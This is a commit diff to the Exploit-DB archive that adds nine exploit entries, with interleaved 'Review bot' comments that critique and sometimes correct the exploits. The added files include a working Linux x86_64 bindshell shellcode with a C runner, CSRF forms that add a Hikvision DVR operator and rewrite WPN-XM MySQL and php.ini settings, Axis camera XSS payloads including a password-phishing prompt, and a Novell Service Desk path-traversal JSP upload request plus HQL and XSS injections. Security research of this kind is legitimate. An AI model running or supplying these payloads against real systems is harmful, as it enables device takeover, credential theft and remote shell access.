DB: 2016-04-12

9 new exploits

Hikvision Digital Video Recorder - Cross-Site Request Forgery
WPN-XM Serverstack 0.8.6 - Cross Site Request Forgery
OpenCart 2.1.0.2 to 2.2.0.0 - json_decode Function Remote Code Execution
CAM UnZip 5.1 - Archive Path Traversal
Axis Network Cameras - Multiple Vulnerabilities
Linux/x86_64 - bindshell (PORT: 5600) - 81 bytes
Android - IOMX getConfig/getParameter Information Disclosure
Android - IMemory Native Interface is Insecure for IPC Use
Novell Service Desk 7.1.0_ 7.0.3 and 6.5 - Multiple Vulnerabilities
This commit is contained in:
Offensive Security 2016-04-12 05:04:12 +00:00
parent 939a1a9e78
commit 921bb6b2e3
10 changed files with 860 additions and 0 deletions


@ -35898,3 +35898,12 @@ id,file,description,date,author,platform,type,port
39674,platforms/windows/local/39674.py,"Express Zip <= 2.40 - Path Traversal",2016-04-08,R-73eN,windows,local,0
39675,platforms/osx/local/39675.c,"Apple Intel HD 3000 Graphics driver 10.0.0 - Local Privilege Escalation",2016-04-08,"Piotr Bania",osx,local,0
39676,platforms/php/webapps/39676.txt,"op5 7.1.9 - Remote Command Execution",2016-04-08,hyp3rlinx,php,webapps,443
39677,platforms/hardware/webapps/39677.html,"Hikvision Digital Video Recorder - Cross-Site Request Forgery",2016-04-11,LiquidWorm,hardware,webapps,80
39678,platforms/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross Site Request Forgery",2016-04-11,hyp3rlinx,php,webapps,80
39679,platforms/php/webapps/39679.txt,"OpenCart 2.1.0.2 to 2.2.0.0 - json_decode Function Remote Code Execution",2016-04-11,"Naser Farhadi",php,webapps,80
39680,platforms/windows/local/39680.txt,"CAM UnZip 5.1 - Archive Path Traversal",2016-04-11,hyp3rlinx,windows,local,0
39683,platforms/hardware/webapps/39683.txt,"Axis Network Cameras - Multiple Vulnerabilities",2016-04-11,Orwelllabs,hardware,webapps,80
39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86_64 - bindshell (PORT: 5600) - 81 bytes",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0
39685,platforms/android/dos/39685.txt,"Android - IOMX getConfig/getParameter Information Disclosure",2016-04-11,"Google Security Research",android,dos,0
39686,platforms/android/dos/39686.txt,"Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0
39687,platforms/jsp/webapps/39687.txt,"Novell Service Desk 7.1.0_ 7.0.3 and 6.5 - Multiple Vulnerabilities",2016-04-11,"Pedro Ribeiro",jsp,webapps,0
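Review bot: the last added row writes the title as `"Novell Service Desk 7.1.0_ 7.0.3 and 6.5 - Multiple Vulnerabilities"`, swapping the comma of the advisory's own title (`7.1.0, 7.0.3 and 6.5`) for an underscore; the description field is already double-quoted, so the comma parses correctly and should be kept as in the advisory. The same row records port 0 while the other webapps rows added in this hunk (39677, 39678, 39679, 39683) record 80; use 80 for consistency or state why this one differs. Also note that ids 39681 and 39682 are skipped between 39680 and 39683, so the index jumps; if those ids are reserved for later files, say so in the commit message.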


platforms/android/dos/39685.txt Executable file

@ -0,0 +1,46 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=711
Android: Information Disclosure in IOMX getConfig/getParameter
Platform: Verified on google/razor/flo:6.0.1/MMB29O/2459718:user/release-keys
Class: Information Disclosure
Summary:
The GET_CONFIG and GET_PARAMETER calls on IOMX are vulnerable to an information disclosure of uninitialized heap memory. This could be used by an attacker to break ASLR in the media server process by reading out heap memory which contains useful address information.
Description:
The relevant code in frameworks/av/media/libmedia/IOMX.cpp is:
node_id node = (node_id)data.readInt32();
OMX_INDEXTYPE index = static_cast<OMX_INDEXTYPE>(data.readInt32());
size_t size = data.readInt64();
void *params = malloc(size);
data.read(params, size); <- Read in the buffer from the parcel to initialize
// SNIP - getParameter etc.
if ((code == GET_PARAMETER || code == GET_CONFIG) && err == OK) {
reply->write(params, size); <- Write back entire buffer to caller
}
The vulnerability stems from the fact that Parcel::read(void* outData, size_t len) fails quickly if it doesnt have sufficient data in the parcel to satisfy the request leaving the outData buffer untouched. As long as the call to getParameter or getConfig succeed then the entire, mostly uninitialized buffer will be returned. For example if the parameter is only 8 bytes in size but the caller passes a size field of 128 bytes (but doesnt write those 128 bytes into the parcel) then the 120 bytes following in the heap will be returned uninitialized.
Arguably theres also a potential NULL pointer dereference here depending on the implementation as the call to malloc can fail with an arbitrary size value. But I think later functions handle the NULL case.
Id suggest that the result of data.read should be checked to ensure all the data has been read correctly.
Proof of Concept:
Ive provided a PoC which exploits the issue and prints a 64 byte buffer (with 56 bytes uninitialized) to logcat. It uses the OMX.qcom.video.decoder.mpeg4 component. Ive only tested this on a Nexus 5 and Nexus 7 devices, but Im guessing that decoder should be everywhere. You should be able to create default Android Studio project and call OMXInfoDisclosurePoC.testOMX
from the Main Activity. When run you should see a line in logcat similar to:
E/MyClass: allocateNode Error: 0
E/MyClass: Allocate Node: 42
E/MyClass: Result: 040000000101000XXXXXXXXXX
Where XXXXXX should be uninitialized memory from the heap.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39685.zip
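Review bot: the remediation `Id suggest that the result of data.read should be checked to ensure all the data has been read correctly.` closes the leak but leaves `size_t size = data.readInt64();` feeding `void *params = malloc(size);` with an attacker-chosen 64-bit value; the fix should also reject any size larger than the data remaining in the parcel before allocating, which removes both the uninitialised-return path and the allocation-failure path the description flags at `the call to malloc can fail with an arbitrary size value`. Documentation: the hunk carries two `Proof of Concept:` headings, one introducing the description of the PoC and one introducing the appended archive link; label the second one differently (for example `PoC archive:`) so the two are not confused. The `Platform:` line gives one tested build while the text says the PoC was run on a Nexus 5 and a Nexus 7; listing the second build string would make the test coverage match the claim.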

platforms/android/dos/39686.txt Executable file

@ -0,0 +1,90 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=706
Android: IMemory Native Interface is insecure for IPC use
Platform: Tested on Android 6.0.1 January patches
Class: Elevation of Privilege
Summary:
The IMemory interface in frameworks/native/libs/binder/IMemory.cpp, used primarily by the media services can be tricked to return arbitrary memory locations leading to information disclosure or memory corruption.
Description:
The IMemory interface allows the passing of shared memory across the Binder IPC channel on Android. The interface supports a single remote call, GET_MEMORY which requests a separate IMemoryHeap interface along with an offset value and size for the shared memory buffer. The IMemoryHeap interface in turn supports a HEAP_ID call which marshals across a FileDescriptor, size, flags and an offset. This is passed to mmap to map the shared memory into the current process.
The underlying vulnerability is the sizes in IMemory and IMemoryHeap are not checked relative to one another, and nor is the offset in IMemory checked against the size of IMemoryHeap. This allows a local process to craft fake IMemory and IMemoryHeap objects such that they lie about their values and either cause information disclosure or memory corruption.
To understand this lets look at how the pointer to the shared buffer is extracted from IMemory::pointer:
void* IMemory::pointer() const {
ssize_t offset;
sp<IMemoryHeap> heap = getMemory(&offset);
void* const base = heap!=0 ? heap->base() : MAP_FAILED;
if (base == MAP_FAILED)
return 0;
return static_cast<char*>(base) + offset; <- No check on IMemoryHeap size
}
Maybe we check sizes in getMemory() ?
sp<IMemoryHeap> BpMemory::getMemory(ssize_t* offset, size_t* size) const
{
if (mHeap == 0) {
Parcel data, reply;
data.writeInterfaceToken(IMemory::getInterfaceDescriptor());
if (remote()->transact(GET_MEMORY, data, &reply) == NO_ERROR) {
sp<IBinder> heap = reply.readStrongBinder();
ssize_t o = reply.readInt32();
size_t s = reply.readInt32(); <- No check.
if (heap != 0) {
mHeap = interface_cast<IMemoryHeap>(heap);
if (mHeap != 0) {
mOffset = o;
mSize = s;
}
}
}
}
if (offset) *offset = mOffset;
if (size) *size = mSize;
return mHeap;
}
Nope, as we can see, no check is made of IMemoryHeaps size, so you could specify a mapped file smaller than offset and create a pointer out of bounds. Of course if IMemoryHeap is invalid then the mmap process will return MAP_FAILED which will end up as NULL after the call to pointer().
So how can this be abused? Any IPC service which calls pointer() can be tricked into accessing an arbitrary location, either a relative offset to the file mapped or NULL. For example look at ICrypto::onTransact with the DECRYPT operation. It checks that the offset is within the total size (this has been exploited before) with:
} else if (totalSize > sharedBuffer->size()) {
result = -EINVAL;
} else if ((size_t)offset > sharedBuffer->size() - totalSize) {
result = -EINVAL;
The size is the value returned through IMemory, and not the actual mapped size from IMemoryHeap so in this case offset can be arbitrary. With the right plugin (such as the clearkey plugin) we can get this to read arbitrary memory. Even more so as theres no NULL checking in pointer() we can cause IMemoryHeap to fail which causes pointer() to return NULL. Setting size to 0xFFFFFFFF means we can read any memory location from 0 to 0xFFFFFFFF.
This can be turned into an arbitrary write as long as you can pass an arbitrary IMemory to another service. For example the BnCameraRecordingProxy::onTransact in frameworks/av/camera/ICameraRecordingProxy.cpp does the following for onReleaseRecordingFrame
case RELEASE_RECORDING_FRAME: {
ALOGV("RELEASE_RECORDING_FRAME");
CHECK_INTERFACE(ICameraRecordingProxy, data, reply);
sp<IMemory> mem = interface_cast<IMemory>(data.readStrongBinder());
if (CameraUtils::isNativeHandleMetadata(mem)) {
VideoNativeHandleMetadata *metadata =
(VideoNativeHandleMetadata*)(mem->pointer());
metadata->pHandle = data.readNativeHandle();
// releaseRecordingFrame will be responsble to close the native handle.
}
releaseRecordingFrame(mem);
return NO_ERROR;
} break;
As you can coerce the pointer value, as long as the first 4 bytes make the integer 3 the next 4 bytes will be overwritten by the native handle value which can be controlled.
Proof of Concept:
Ive provided a PoC which exploits the issue in ICrypto::decrypt. I will just SIG_SEGV on reading an arbitrary location (in this case 1GiB relative to the mapped memory). If it succeeds then thats good as well as it shouldn't succeed. You should be able to create default Android Studio project and replace the MainActivity with the provided Java file. When run it should cause media server to crash.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39686.zip
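Review bot: the sentence `Even more so as theres no NULL checking in pointer() we can cause IMemoryHeap to fail which causes pointer() to return NULL.` contradicts the quoted function, which does test `if (base == MAP_FAILED) return 0;`; the missing check is in the callers, for example `(VideoNativeHandleMetadata*)(mem->pointer());` is dereferenced at `metadata->pHandle = data.readNativeHandle();` without testing for NULL, and the ICrypto bounds check compares `offset` against `sharedBuffer->size()`, the caller-supplied IMemory size, rather than against the heap's mapped size. Reword that sentence to say the NULL return is unchecked by callers, and state the proposed fix explicitly: in `BpMemory::getMemory` reject replies where `o` is negative or `o + s` exceeds the size of the IMemoryHeap, and make every caller of `pointer()` handle a NULL result. Minor: `I will just SIG_SEGV on reading an arbitrary location` should read `It will just SIGSEGV`, and `Ive`, `thats`, `theres` have lost their apostrophes.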

platforms/hardware/webapps/39677.html

@ -0,0 +1,53 @@
<!--
Hikvision Digital Video Recorder Cross-Site Request Forgery
Vendor: Hikvision Digital Technology Co., Ltd
Product web page: http://www.hikvision.com
Affected version: LV-D2104CS
DS-7316HFI-ST
DS-7216HVI-SV/A
DS-7208HVI-SH
DS-7204HVI-SH
Summary: Hikvision is the global leader of video surveillance
products and solutions, manufactures a wide range of top-quality,
reliable, and professional solutions.
Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.
Tested on: Hikvision-Webs
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5315
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5315.php
Vendor: http://overseas.hikvision.com/europe/list01_435.html
13.01.2016
--
CSRF Add Operator:
------------------
-->
<html>
<body>
<form action="http://10.0.0.8/PSIA/Security/AAA/users" method="POST" enctype="text/plain">
<input type="hidden" name="<&#63;xml&#32;version" value="&apos;1&#46;0&apos;&#32;encoding&#61;&apos;utf&#45;8&apos;&#63;><User><id>3<&#47;id><userName>tes2t<&#47;userName><password>test2<&#47;password><Extensions><bondIp><ipAddress>0&#46;0&#46;0&#46;0<&#47;ipAddress><&#47;bondIp><attribute><inherent>true<&#47;inherent><&#47;attribute><&#47;Extensions><&#47;User>" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
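Review bot: the header comment contains a bare `--` line just before `CSRF Add Operator:`; a double hyphen is not permitted inside an HTML comment, and although browsers tolerate it here a strict parser may end or reject the comment, so delete the line or use a different separator. The PoC depends on `enctype="text/plain"` joining the hidden field's `name` and `value` with `=`, which is what turns `<&#63;xml&#32;version` plus `&apos;1&#46;0&apos;...` into a well-formed `<?xml version='1.0' encoding='utf-8'?>` prologue; that trick is the whole point of the form and deserves one sentence in the comment, together with a note that the trailing CR/LF the encoding appends is harmless after `</User>`. The target `http://10.0.0.8` and the fixed `<id>3</id>` are test values; say that the host must be changed and that the id must not collide with an existing account, otherwise the request can fail or overwrite a user rather than add one.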

platforms/hardware/webapps/39683.txt

@ -0,0 +1,138 @@
_ _ _ _
| | | | | |
___ _ ____ _____| | | | __ _| |__ ___
/ _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __| 6079 Smith W
| (_) | | \ V V / __/ | | | (_| | |_) \__ \ doubleplusungood
\___/|_| \_/\_/ \___|_|_|_|\__,_|_.__/|___/ owning some telescreens...
Security Adivisory
2016-04-09
www.orwelllabs.com
twt:@orwelllabs
I. ADVISORY INFORMATION
-----------------------
Title: Axis Network Cameras Multiple Cross-site scripting
Vendor: Axis Communications
Class: Improper Input Validation [CWE-20]
CVE Name: CVE-2015-8256
Remotely Exploitable: Yes
Locally Exploitable: No
OLSA-ID: OLSA-2015-8256
Adivisory URL:
http://www.orwelllabs.com/2016/01/axis-network-cameras-multiple-cross.html
II. Background
--------------
Axis is the market leader in network video, invented the worlds first
network camera back in 1996 and weve been innovators in video surveillance
ever since. Axis network video products are installed in public places and
areas such as retail chains, airports, trains, motorways, universities,
prisons, casinos and banks.
III. vulnerability
------------------
AXIS Network Cameras are prone to multiple (stored/reflected) cross-site
scripting vulnerability.
IV. technical details
---------------------
These attack vectors allow you to execute an arbitrary javascript code in
the user browser (session) with this steps:
# 1 Attacker injects a javascript payload in the vulnerable page:
http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script
type="text/javascript>prompt("AXIS_PASSWORD:")</script>
This will create a entry in the genneral log file (/var/log/messages) So,
when the user is viewing the log 'system options' -> 'support' -> 'Logs &
Reports':
http://{axishost}/axis-cgi/admin/systemlog.cgi?id
will be displayed a prompt for the password of the current user
('AXIS_PASSWORD').
However, due to CSRF presented is even possible to perform all actions
already presented: create, edit and remove users and applications, etc. For
example, to delete an application "axis_update" via SXSS:
http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script src="http://
axishost/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml"></script>
* A reflected cross-site scripting affects all models of AXIS devices on
the same parameter:
http://
{axis-cam-model}/view/view.shtml?imagePath=0WLL</script><script>alert('AXIS-XSS')</script><!--
# Other Vectors
http://
{axishost}/admin/config.shtml?group=%3Cscript%3Ealert%281%29%3C/script%3E
http://{axishost}/view/custom_whiteBalance.shtml?imagePath=<img src="xs"
onerror=alert(7) /><!--
http://
{axishost}/admin-bin/editcgi.cgi?file=<script>alert('SmithW')</script>
http://
{axishost}/operator/recipient_test.shtml?protocol=%3Cscript%3Ealert%281%29%3C/script%3E
http://
{axishost}/admin/showReport.shtml?content=alwaysmulti.sdp&pageTitle=axis</title></head><body><pre><script>alert(1)</script>
# SCRIPTPATHS:
{HTMLROOT}/showReport.shtml
{HTMLROOT}/config.shtml
{HTMLROOT}/incl/top_incl.shtml
{HTMLROOT}/incl/popup_header.shtml
{HTMLROOT}/incl/page_header.shtml
{HTMLROOT}/incl/top_incl_popup.shtml
{HTMLROOT}/viewAreas.shtml
{HTMLROOT}/vmd.shtml
{HTMLROOT}/custom_whiteBalance.shtml
{HTMLROOT}/playWindow.shtml
{HTMLROOT}/incl/ptz_incl.shtml
{HTMLROOT}/view.shtml
{HTMLROOT}/streampreview.shtml
And many, many others...
V. Impact
---------
allows to run arbitrary code on a victim's browser and computer if combined
with another flaws in the same devices.
VI. Affected products
---------------------
Multiple Axis Network products.
VII. solution
-------------
It was not provided any solution to the problem.
VIII. Credits
-------------
The vulnerability has been discovered by SmithW from OrwellLabs
IX. Legal Notices
-----------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this
information.
X. Vendor solutions and workarounds
-----------------------------------
There was no response from the vendor.
About Orwelllabs
++++++++++++++++
Orwelllabs is a (doubleplusungood) security research lab interested in embedded
device & webapp hacking.
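Review bot: the first payload `<script type="text/javascript>prompt("AXIS_PASSWORD:")</script>` is missing the closing quote of the `type` attribute, so a browser reads `text/javascript>prompt(` as the attribute value and the prompt never runs; it should be `<script type="text/javascript">prompt("AXIS_PASSWORD:")</script>`, or simply `<script>`. The sentence `However, due to CSRF presented is even possible to perform all actions already presented` refers to a CSRF issue that this advisory does not present; either include it or cite where it is documented, since the `local_del.cgi` example depends on it. `IV. technical details` also omits which user role sees `systemlog.cgi`, which matters for the stored vector because the prompt only fires for whoever opens the log page. Typos: `Adivisory` (twice), `genneral`, `worlds`, `weve`, `a entry`, `this steps`.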

platforms/jsp/webapps/39687.txt Executable file

@ -0,0 +1,172 @@
>> Multiple vulnerabilities in Novell Service Desk 7.1.0, 7.0.3 and 6.5
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 30/03/2016 / Last updated: 10/04/2016
>> Background on the affected products:
"Novell Service Desk 7.1.0 is a complete service management solution that allows you to easily monitor and solve services issues so that there is minimal disruption to your organization, which allows users to focus on the core business. Novell Service Desk provides an online support system to meet the service requirements of all your customers, administrators, supervisors, and technicians"
>> Summary:
Novell Service Desk has several vulnerabilities including a file upload function that can be exploited to achieve authenticated remote code execution. The product appears to be a rebranded version of Absolute Service (another help desk system). The latter has not been tested but it is likely to contain the same vulnerabilities as Novell Service Desk. The Google dork for this application is inurl:"LiveTime/WebObjects". Version 7.2 and above now appear to be branded as "Micro Focus Service Desk".
Advisories for these vulnerabilities can be found in the Micro Focus site at [1], [2], [3] and [4].
>> Technical details:
#1
Vulnerability: Arbitrary file upload via directory traversal (leading to remote code execution)
CVE-2016-1593
Constraints: Administrator account needed
Affected versions:
- NSD 7.1.0
- NSD 7.0.3
- NSD 6.5
- Possibly earlier versions
The User -> Customers -> Import function allows an administrator to upload files. The path specified in the filename parameter can be traversed using ../ characters and upload a JSP file to the Tomcat directory.
The default path to be traversed is /LiveTime/Uploads/ on the Novell Service Desk Virtual Appliance Demo.
POST /LiveTime/WebObjects/LiveTime.woa/wo/7.0.53.19.0.2.7.0.3.0.0.1 HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------2477470717121
Content-Length: 533
-----------------------------2477470717121
Content-Disposition: form-data; name="0.53.19.0.2.7.0.3.0.0.1.1.1.4.0.0.23"; filename="../../srv/tomcat6/webapps/LiveTime/bla5.jsp"
Content-Type: application/octet-stream
<HTML>
<HEAD>
<TITLE>Hello World</TITLE>
</HEAD>
<BODY>
<H1>Hello World</H1>
Today is: <%= new java.util.Date().toString() %>
</BODY>
</HTML>
-----------------------------2477470717121
Content-Disposition: form-data; name="ButtonUpload"
Upload
-----------------------------2477470717121--
#2
Vulnerability: Information disclosure (Download System logs as any authenticated user - even unprivileged customers)
CVE-2016-1594
Constraints: User / client account needed
Affected versions:
- NSD 7.0.3
- NSD 6.5
- Possibly earlier versions
GET /LiveTime/WebObjects/LiveTime.woa/wa/DownloadAction/downloadLogFiles
Contains the full error log, license and system information (operating system, java version, database, etc).
#3
Vulnerability: Information disclosure (Download any attachment from any client as an authenticated user - even unprivileged customers)
CVE-2016-1594
Constraints: User / client account needed
Affected versions:
- NSD 7.1.0
- NSD 7.0.3
- NSD 6.5
- Possibly earlier versions
GET /LiveTime/WebObjects/LiveTime.woa/wa/DownloadAction/downloadFile?attachmentId=1&entityName=ItemTypeAttach
Possible entityNames are:
KbaAttachment
ServiceAttachment
IncidentAttachment
ItemAttach
ProjectAttachment
GroupAttachment
ContractAttachment
ItemTypeAttach
Cycling through all attachmentId numbers will yield all attachments for each entityName.
#4
Vulnerability: Hibernate Query Language (HQL) injection
CVE-2016-1595
Constraints: User / client account needed
Affected versions:
- NSD 7.1.0
- NSD 7.0.3
- NSD 6.5
- Possibly earlier versions
GET /LiveTime/WebObjects/LiveTime.woa/wa/DownloadAction/downloadFile?attachmentId=1&entityName=<HQL injection here>
Input is passed directly to Hibernate (line 125 of DownloadAction.class):
List<?> attachments = ((com.livetime.Session)session()).getDbSession().createQuery(new StringBuilder().append("from ").append(hasEn).append(" as attach where attach.attachmentId = ").append(hasId.intValue()).toString()).list();
hasEn is entityName (string) and hasId is attachmentId (integer)
#5
Vulnerability: Stored Cross Site Scripting (XSS)
CVE-2016-1596
Constraints: User / client account needed
Affected versions:
- NSD 7.1.0
- NSD 7.0.3
- NSD 6.5
- Possibly earlier versions
Several sections of the web application are vulnerable to stored cross site scripting. This includes the administrator portal (when logged in as an administrator, technician, manager or other administrative user), the end user portal (when logged in as a normal end user) and the forums. The vulnerabilities below are just examples as the vulnerability is present in many different pages.
a)
In the customer portal, clicking the user name will allow you to edit your display name.
The fields tf_aClientFirstName and tf_aClientLastName are also vulnerable to stored XSS. Other fields might be vulnerable but have not been tested.
Example:
tf_aClientFirstName=Jos"><script>alert(1)</script>e&tf_aClientEmail=aa%40aa.bb&tf_aClientLastName="><script>alert(2)</script>Guestaa
This can be used to attack an administrator or any other management user, as the name will be changed globally. If an administrator sees the list of users an alert box will pop up.
b)
In the Forums the content section is vulnerable when creating a new topic.
The affected parameter is ta_selectedTopicContent.
Example:
tf_selectedTopicTitle=aaaaa&ta_selectedTopicContent="><script>alert(2)</script>&ButtonSave=Save
The alert box will pop up when you view the topic.
c)
In User -> Organizational Units, the name parameter is vulnerable (tf_orgUnitName) when you are creating a new Organizational Unit.
Example:
POST /LiveTime/WebObjects/LiveTime.woa/wo/18.0.53.21.0.4.1.3.0.1 HTTP/1.1
-----------------------------3162880314525
Content-Disposition: form-data; name="tf_orgUnitName"
"><script>alert(1)</script>
The alert box will pop up when you view the Organizational Units page and possibly in other pages.
d)
In Configuration -> Vendors, the manufacturer name, address and city parameters are vulnerable when you are creating a new Vendor.
Example:
tf_aManufacturerFullName="><script>alert(1)</script>&tf_aManufacturerName="><script>alert(1)</script>&tf_aManufacturerAddress="><script>alert(1)</script>&tf_aManufacturerCity="><script>alert(1)</script>&tf_aManufacturerPostalCode=&pu_countryDGDisplayedObjects=WONoSelectionString&tf_aManufacturerPhone=&tf_aManufacturerFax=&tf_aManufacturerUrl=&ButtonSave=Save
Three alert boxes will pop up when you view the Vendor page and possibly in other pages.
>> Fix:
#1, #3, #4 and 5# - Upgrade to version 7.2.0
#2 - Upgrade to version 7.1.0
>> References:
[1] https://www.novell.com/support/kb/doc.php?id=7017428
[2] https://www.novell.com/support/kb/doc.php?id=7017429
[3] https://www.novell.com/support/kb/doc.php?id=7017431
[4] https://www.novell.com/support/kb/doc.php?id=7017430
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
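Review bot: #2 and #3 both carry `CVE-2016-1594`; if the two download issues really share one id say so in the text, otherwise one of them needs its own, and in the Fix section `#1, #3, #4 and 5# - Upgrade to version 7.2.0` should read `#5`. In #4 the quoted `createQuery(new StringBuilder().append("from ").append(hasEn)...` concatenates `hasEn` straight into the HQL `from` clause while `hasId.intValue()` is already type-safe, so the remediation advice should include validating `entityName` against the eight entity names listed under #3 (or a server-side mapping) rather than only an upgrade. The summary's `authenticated remote code execution` should say administrator-authenticated, matching `Constraints: Administrator account needed` under #1, so readers do not take it for any-user RCE. Missing documentation: the #1 request omits the session cookie and the host header, and the `wo/7.0.53.19.0.2.7.0.3.0.0.1` action path is session-specific in WebObjects; note that both must be taken from a live session.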

platforms/lin_x86-64/shellcode/39684.c

@ -0,0 +1,88 @@
/*
---------------------------------------------------------------------------------------------------
Linux/x86_64 - bindshell (PORT: 5600) - 81 bytes
Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |
---------------------------------------------------------------------------------------------------
Disassembly of section .text:
0000000000400080 <.text>:
400080: 99 cdq
400081: 6a 29 push 0x29
400083: 58 pop rax
400084: 6a 01 push 0x1
400086: 5e pop rsi
400087: 6a 02 push 0x2
400089: 5f pop rdi
40008a: 0f 05 syscall
40008c: 48 97 xchg rdi,rax
40008e: 6a 02 push 0x2
400090: 66 c7 44 24 02 15 e0 mov WORD PTR [rsp+0x2],0xe015
400097: 54 push rsp
400098: 5e pop rsi
400099: 52 push rdx
40009a: 6a 10 push 0x10
40009c: 5a pop rdx
40009d: 6a 31 push 0x31
40009f: 58 pop rax
4000a0: 0f 05 syscall
4000a2: 50 push rax
4000a3: 5e pop rsi
4000a4: 6a 32 push 0x32
4000a6: 58 pop rax
4000a7: 0f 05 syscall
4000a9: 6a 2b push 0x2b
4000ab: 58 pop rax
4000ac: 0f 05 syscall
4000ae: 48 97 xchg rdi,rax
4000b0: 6a 03 push 0x3
4000b2: 5e pop rsi
4000b3: 48 ff ce dec rsi
4000b6: 6a 21 push 0x21
4000b8: 58 pop rax
4000b9: 0f 05 syscall
4000bb: 75 f6 jne 0x4000b3
4000bd: 99 cdq
4000be: 52 push rdx
4000bf: 48 b9 2f 62 69 6e 2f movabs rcx,0x68732f2f6e69622f
4000c6: 2f 73 68
4000c9: 51 push rcx
4000ca: 54 push rsp
4000cb: 5f pop rdi
4000cc: 6a 3b push 0x3b
4000ce: 58 pop rax
4000cf: 0f 05 syscall
---------------------------------------------------------------------------------------------------
How To Run
$ gcc -o bind_shell bind_shell.c
$ execstack -s sh_shell
$ ./sh_shell
How to Connect
$ nc <HOST IP ADDRESS> 5600
Eg:
$ nc 127.0.0.1 5600
---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\x99\x6a\x29\x58\x6a\x01\x5e\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x50\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x99\x52\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x51\x54\x5f\x6a\x3b\x58\x0f\x05";
void main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) sh;
(int)(*func)();
}
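Review bot: the run instructions compile to one name and execute another: `$ gcc -o bind_shell bind_shell.c` is followed by `$ execstack -s sh_shell` and `$ ./sh_shell`; use a single binary name. `void main(int argc, char **argv)` should be `int main(void)` since the arguments are unused, and the `(int)` cast on `(int)(*func)();` does nothing. `char sh[]` is a writable global in .data, not a stack buffer, so relying on `execstack -s` to make it executable is fragile; either build with `gcc -z execstack` and state that the trick depends on the loader applying the executable-stack flag to other mappings, or place the buffer in an executable section explicitly. The listing is consistent with the title: 0x400080 to 0x4000d1 is 81 bytes, and `mov WORD PTR [rsp+0x2],0xe015` is port 5600 in network byte order. One behaviour worth a comment for readers: the `accept` at 0x4000a9 runs with rsi=0 (NULL address, the 0 returned by `bind`) and rdx still 0x10, which the kernel ignores when the address is NULL, so it works but looks like a leftover argument.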

platforms/php/webapps/39678.txt Executable file

@ -0,0 +1,113 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt
Vendor:
===========
wpn-xm.org
Product:
==============================================
WPN-XM Serverstack for Windows - Version 0.8.6
WPN-XM is a free and open-source web server solution stack for professional
PHP development on the Windows platform.
Vulnerability Type:
================================
CSRF - MySQL / PHP.INI Hijacking
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
WPN-XMs webinterface is prone to multiple CSRF entry points allowing remote
attackers to compromise an authenticated user if they visit
a malicious webpage or click an attacker supplied link. Attackers can
modify the 'PHP.INI' file to change arbitrary PHPs settings
like enable 'allow_url_include' or changing the default MySQL username &
password settings etc...
Exploit code(s):
===============
1) Hijack MySQL Account Default Settings
<iframe name="ifrm" width="600" height="700" name="hidden-form"></iframe>
<form target="ifrm" id="CSRF-MySQL-Username" method="post" action="
http://localhost/tools/webinterface/index.php?page=config&action=update-phpini-setting
">
<input type="hidden" name="page" value="config">
<input type="hidden" name="action" value="update-phpini-setting">
<input type="hidden" name="directive" value="mysql.default_user" />
<input type="hidden" name="value" value="hyp3rlinx" />
<script>document.getElementById('CSRF-MySQL-Username').submit()</script>
</form>
<form target="ifrm" id="CSRF-MySQL-PWD" method="post" action="
http://localhost/tools/webinterface/index.php?page=config&action=update-phpini-setting
">
<input type="hidden" name="page" value="config">
<input type="hidden" name="action" value="update-phpini-setting">
<input type="hidden" name="directive" value="mysql.default_password">
<input type="hidden" name="value" value="PWNED!" />
<script>document.getElementById('CSRF-MySQL-PWD').submit()</script>
</form>
2) Hijack PHP.INI Settings
<form id="CSRF-PHP-INI" method="post" action="
http://localhost/tools/webinterface/index.php?page=config&action=update-phpini-setting
">
<input type="hidden" name="directive" value="allow_url_include" />
<input type="hidden" name="value" value="On" />
<script>document.getElementById('CSRF-PHP-INI').submit()</script>
</form>
Disclosure Timeline:
=====================================
Vendor Notification: No Reply
April 9, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
Medium
=================================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
